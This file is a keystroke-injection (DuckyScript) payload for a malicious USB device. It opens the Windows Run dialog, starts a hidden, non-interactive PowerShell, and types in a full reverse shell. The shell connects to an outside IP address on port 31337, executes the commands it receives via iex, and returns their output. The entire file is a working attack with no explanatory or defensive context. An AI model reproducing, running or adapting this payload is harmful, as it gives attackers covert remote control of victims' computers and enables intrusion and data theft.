DELAY 1500
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Command
DELAY 250
ENTER
DELAY 200

STRING $client = New-Object System.Net.Sockets.TCPClient("45.92.178.34", 31337);
DELAY 100
STRING $stream = $client.GetStream();
DELAY 100
STRING [byte[]]$buffer = 0..65535|%{0};
DELAY 100
STRING function Set-CultureWin([System.Globalization.CultureInfo] $culture) { [System.Threading.Thread]::CurrentThread.CurrentUICulture = $culture ; [System.Threading.Thread]::CurrentThread.CurrentCulture = $culture } ; Set-CultureWin en-US ; [system.threading.thread]::currentthread.currentculture
DELAY 100
STRING while(($bytesRead = $stream.Read($buffer, 0, $buffer.Length)) -ne 0) {
DELAY 100
STRING $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($buffer,0, $bytesRead);
DELAY 100
STRING $sendback = (iex $data 2>&1 | Out-String );
DELAY 100
STRING $sendback2  = $sendback + "PS " + (pwd).Path + "> ";
DELAY 100
STRING $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
DELAY 100
STRING $stream.Write($sendbyte, 0, $sendbyte.Length);
DELAY 100
STRING $stream.Flush()
DELAY 100
STRING };
DELAY 100
STRING $client.Close()
DELAY 100
ENTER